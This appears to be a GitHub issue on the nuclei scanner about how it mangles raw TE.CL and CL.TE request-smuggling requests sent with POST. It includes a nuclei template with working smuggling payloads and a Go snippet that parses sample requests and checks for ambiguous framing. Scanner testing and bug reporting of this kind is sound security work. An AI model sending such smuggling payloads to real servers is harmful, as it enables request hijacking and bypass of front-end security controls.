projectdiscovery / nuclei

Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps you find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.
https://docs.projectdiscovery.io/tools/nuclei
MIT License

Nuclei doesn't process the raw request of HTTP request smuggling (CL.TE or TE.CL) when the request uses the POST method. #5416

Open shubham058 opened 3 months ago

shubham058 commented 3 months ago

Nuclei version:

3.2.9

Current Behavior:

While creating a template for TE.CL and CL.TE HTTP request smuggling, and proxying it through Burp to get an idea of how Nuclei treats the raw request in order to get the desired result, it was observed that if the request uses the POST method and its body starts with 0 (Transfer-Encoding), Nuclei will break the request there (basically simplifies it) and the rest of the smuggling payload will be ignored.

If the request body has some size like 122, as in the attachment, and the request uses the POST method, then Nuclei will ignore the size of the Transfer-Encoding chunk, which is 122, and keep the rest of the body, which will cause unexpected behavior.

Reproduce:

  1. Potential HTTP request smuggling

-> Download the template "Potential-HTTP-request-smuggling" -> run it using -> nuclei.exe -t -u -p -rl 4 -> refer to screenshot "POST method simplified"


Potential-Http-request-smuggling - Copy.txt

The raw request is different from the request that Nuclei makes while running the template, which is simplified. It seems Nuclei treats the "Transfer-Encoding" header while running and breaks the request when it comes to the 0 byte, which it shouldn't be doing.

  2. http-request-smuggling-tecl

-> Download the template. -> run it using -> nuclei.exe -t -u -p -rl 4 -> refer to screenshot "Nuclei ignores the chunk size"


-> Nuclei template -> http-request-smuggling-tecl copy.txt

Note: This behavior only occurs with the POST method; with GET everything works fine.

However, instead of threads, I tried to use pipeline support to achieve HTTP pipelining, and Nuclei doesn't support it properly.

Certain errors -> Could not execute request for "hostname" dialing to the given TCP address timed out

id: te-cl-smuggling

info:
  name: Test for te cl smuggling
  author: shubhams
  severity: medium
  description: Smuggling using Pipeline

http:
  - raw:
      - |+
        GET /login HTTP/1.1
        X: X
        Host: {{Host}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 4
        Transfer-Encoding: chunked

        122
        GET / HTTP/1.1
        Host: vulnerable-website.com
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 10

        x=1
        0

      - |+
        GET /login HTTP/1.1
        X: X
        Host: {{Host}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 4
        Transfer-Encoding: chunked

        122
        GET / HTTP/1.1
        Host: vulnerable-website.com
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 10

        x=1
        0

    unsafe: true
    pipeline: true
    pipeline-concurrent-connections: 1
    pipeline-requests-per-connection: 2

    # matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - Juice Shop
          - "This is a deliberately vulnerable web application designed for testing web"

      - type: dsl
        dsl:
          - "len(body) > 11000"
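The two body shapes from the report, fed through Go's standard `net/http` parser as an added illustration (this is not Nuclei's code, and the issue does not establish that Nuclei's raw client behaves exactly like `net/http`). It shows what any RFC 7230 parser does when a request carries both `Content-Length` and `Transfer-Encoding: chunked`: chunked wins, a body starting with `0` ends at that chunk and the remaining bytes stay unread on the connection, and a `122` chunk that is shorter than announced fails with an unexpected EOF. The `ambiguousFraming` check is the defensive counterpart: an edge component can reject such requests outright. Hostname and body contents are constructed placeholders.

```go
package main

import (
	"bufio"
	"fmt"
	"io"
	"net/http"
	"strings"
)

// Constructed samples (hostname is a placeholder). TE.CL shape: the chunk size
// "122" (0x122 = 290 bytes) is announced, but far fewer body bytes follow.
const rawTECL = "POST /login HTTP/1.1\r\nHost: example.test\r\n" +
	"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n" +
	"122\r\nGET / HTTP/1.1\r\nHost: example.test\r\nContent-Length: 10\r\n\r\n" +
	"x=1\r\n0\r\n\r\n"

// CL.TE shape: Content-Length covers all 13 body bytes, but a chunked parser
// ends the body at the first "0" chunk and leaves the rest on the connection.
const rawCLTE = "POST /login HTTP/1.1\r\nHost: example.test\r\n" +
	"Content-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED"

// Framing records how net/http (an RFC 7230 parser) framed one raw request.
type Framing struct {
	Chunked, Ambiguous bool  // chunked honoured; both framing headers present
	BodyLen, Leftover  int   // body bytes accepted; bytes left unread afterwards
	Err                error // io.ErrUnexpectedEOF when the chunk is short
}

// ambiguousFraming flags a header block carrying both Content-Length and
// Transfer-Encoding; RFC 7230 3.3.3 says such a message ought to be rejected.
func ambiguousFraming(raw string) bool {
	head := strings.ToLower(strings.SplitN(raw, "\r\n\r\n", 2)[0])
	return strings.Contains(head, "\r\ncontent-length:") &&
		strings.Contains(head, "\r\ntransfer-encoding:")
}

func parseRaw(raw string) (Framing, error) {
	br := bufio.NewReader(strings.NewReader(raw))
	req, err := http.ReadRequest(br) // drops Content-Length once chunked is seen
	if err != nil {
		return Framing{}, err
	}
	defer req.Body.Close()
	body, rerr := io.ReadAll(req.Body)
	return Framing{Chunked: len(req.TransferEncoding) > 0, BodyLen: len(body),
		Err: rerr, Leftover: br.Buffered(), Ambiguous: ambiguousFraming(raw)}, nil
}

func main() { f, err := parseRaw(rawCLTE); fmt.Printf("CL.TE: %+v err=%v\n", f, err) }
```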
shubham058 commented 3 months ago

Hello team,

Any update?